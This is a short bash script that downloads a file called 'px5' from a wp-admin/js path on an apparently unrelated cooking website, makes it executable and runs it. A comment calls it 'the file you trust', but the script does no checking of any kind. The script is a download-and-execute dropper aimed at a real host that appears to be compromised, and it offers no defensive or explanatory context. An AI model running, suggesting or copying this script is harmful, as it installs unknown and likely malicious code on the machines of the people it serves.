#!/bin/bash # URL of the file you trust FILE_URL="https://chezvouscuisine.co.uk/wp-admin/js/px5" FILE_NAME="px5" # Download the file curl -L -O "$FILE_URL" # Make it executable chmod +x "$FILE_NAME" # Run it ./"$FILE_NAME"